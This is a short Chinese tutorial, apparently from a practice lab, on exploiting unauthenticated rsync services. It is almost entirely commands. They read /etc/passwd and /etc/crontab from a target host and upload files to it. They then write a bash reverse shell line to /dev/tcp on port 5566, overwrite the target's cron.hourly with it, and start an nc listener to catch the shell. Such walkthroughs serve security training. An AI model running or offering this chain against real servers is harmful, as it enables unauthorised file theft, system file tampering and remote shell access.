编程技术-应用协议安全：Rsync-common 未授权访问.

rsync rsync://172.16.10.130:10890

rsync rsync://测试 IP 地址:端口

rsync rsync://172.16.10.130:55803/src/

rsync rsync://172.16.10.130:10890/src/etc/passwd ./

rsync rsync://测试 IP 地址:端口/src/etc/passwd 下载到这个文件路径下

rsync -av passwd rsync://172.16.10.130:10890/src/tmp/passwd 

rsync -av 要上传文件 rsync://172.16.10.130:10890/路径/

rsync rsync://172.16.10.130:10890/src/tmp/passwd      #读取的文件.

直接下载 crontab 文件：

rsync rsync://172.16.10.130:10890/src/etc/crontab /root/bgxg.txt

touch bgxg        #创建新文件.

vim bgxg          #编辑文件.

#添加在文件中的内容
/bin/bash -i >& /dev/tcp/172.16.10.130/5566 0>&1

chmod +x bgxg     #添加权限.

再进行上传bgxg文件，把cron.hourly替换了

rsync -av bgxg rsync://172.16.10.130:55790/src/etc/cron.hourly

监听这个端口就等着反弹就好.（由于靶场时间比较短，就不等反弹时间了）

nc -lvvp 5566